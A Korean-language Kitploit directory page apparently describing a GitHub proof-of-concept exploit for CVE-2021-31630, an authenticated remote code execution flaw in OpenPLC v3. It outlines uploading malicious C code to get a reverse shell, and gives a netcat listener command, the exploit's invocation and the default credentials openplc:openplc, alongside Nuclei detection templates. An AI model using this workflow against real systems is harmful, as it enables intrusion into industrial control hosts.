Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OpenPLC-CVE-2021-31630-RCE — CVE-2021-31630에 대한 Python 3.13+ 개념 증명 익스플로잇, 악성 하드웨어 레이어 업로드를 통해 OpenPLC v3에서 인증된 원격 코드 실행을 가능하게 합니다. 기본 자격 증명 및 취약점 확인을 위한 Nuclei 탐지 템플릿을 포함합니다. | Kitploit
도구/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

CVE-2021-31630에 대한 Python 3.13+ 개념 증명 익스플로잇, 악성 하드웨어 레이어 업로드를 통해 OpenPLC v3에서 인증된 원격 코드 실행을 가능하게 합니다. 기본 자격 증명 및 취약점 확인을 위한 Nuclei 탐지 템플릿을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
321년 전아직 검토되지 않음

OpenPLC v3 인증된 RCE (CVE-2021-31630)

이것은 OpenPLC v3의 취약점 CVE-2021-31630에 대한 최신 Python 3.13+ 호환 개념 증명 익스플로잇입니다. 이 취약점은 인증된 사용자가 악성 코드가 포함된 사용자 정의 하드웨어 레이어를 업로드할 수 있게 하여 호스트에서 원격 코드 실행(RCE)을 유발합니다.

원본 취약점 발견 및 권고 자료는 Fellipe Oliveira가 제공했습니다. 이 재구현 및 최신화는 httpx, CLI 도구, 로깅 및 보다 안전한 탐지 기술을 사용합니다.

익스플로잇 개요

  • 취약점: CVE-2021-31630
  • 구성 요소: OpenPLC v3 웹 서버
  • 영향: 인증된 원격 코드 실행
  • 기본 자격 증명: openplc:openplc

익스플로잇 흐름

  1. 유효한 자격 증명을 사용하여 로그인
  2. 악성 C 코드를 사용자 정의 하드웨어 레이어로 업로드
  3. 컴파일 트리거
  4. 실행 트리거 (선택 사항)
  5. 리버스 셸 연결 수신

사용법

  1. 리스너 시작:
root@kitploit:~
nc -lvnp 9001
  1. 익스플로잇 실행:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

선택적 플래그:

  • -u 사용자 이름 (기본값: openplc)
  • -p 비밀번호 (기본값: openplc)
  • -t 타임아웃(초) (기본값: 20)

기능

  • Python 3.13+ 호환
  • httpx로 구축
  • 깔끔한 출력을 위한 로깅 지원
  • 재사용성을 위한 모듈식 함수
  • 핵 탐지 템플릿 포함

핵 탐지 템플릿

  1. 기본 자격 증명 확인
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. 수동 RCE 취약점 확인
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

두 번째 템플릿은 로그인한 후 무해한 페이로드 업로드 및 컴파일을 시도하여 실제 코드 실행을 유발하지 않고 취약성을 확인합니다.

포함된 파일

  • OpenPLC_CVE_2021_31630.py – Python 3.13+ 익스플로잇
  • nuclei-templates/openplc-default-login.yaml – 기본 자격 증명 탐지
  • nuclei-templates/openplc-authenticated-rce-check.yaml – 안전하게 취약한 동작 탐지

⚠️ 법적 고지 / 윤리

이 코드는 교육 및 공인된 보안 테스트 목적으로만 사용해야 합니다. 시스템 소유자의 명시적 허가 없이 사용하지 마십시오.

도구 다운로드